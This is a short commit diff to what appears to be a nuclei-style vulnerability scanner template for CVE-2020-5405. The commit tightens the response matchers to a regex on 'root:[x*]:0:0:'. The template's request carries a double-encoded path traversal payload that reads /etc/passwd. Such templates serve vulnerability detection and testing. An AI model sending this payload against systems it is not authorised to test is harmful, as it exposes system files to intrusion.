Update CVE-2020-5405.yaml

patch-1
bauthard 2020-07-06 22:40:05 +05:30
parent ebcf1ec0f6
commit 8362fb3dc2
1 changed files with 5 additions and 4 deletions

View File

@ -11,11 +11,12 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: regex
words: regex:
- "root:" - "root:[x*]:0:0:"
part: body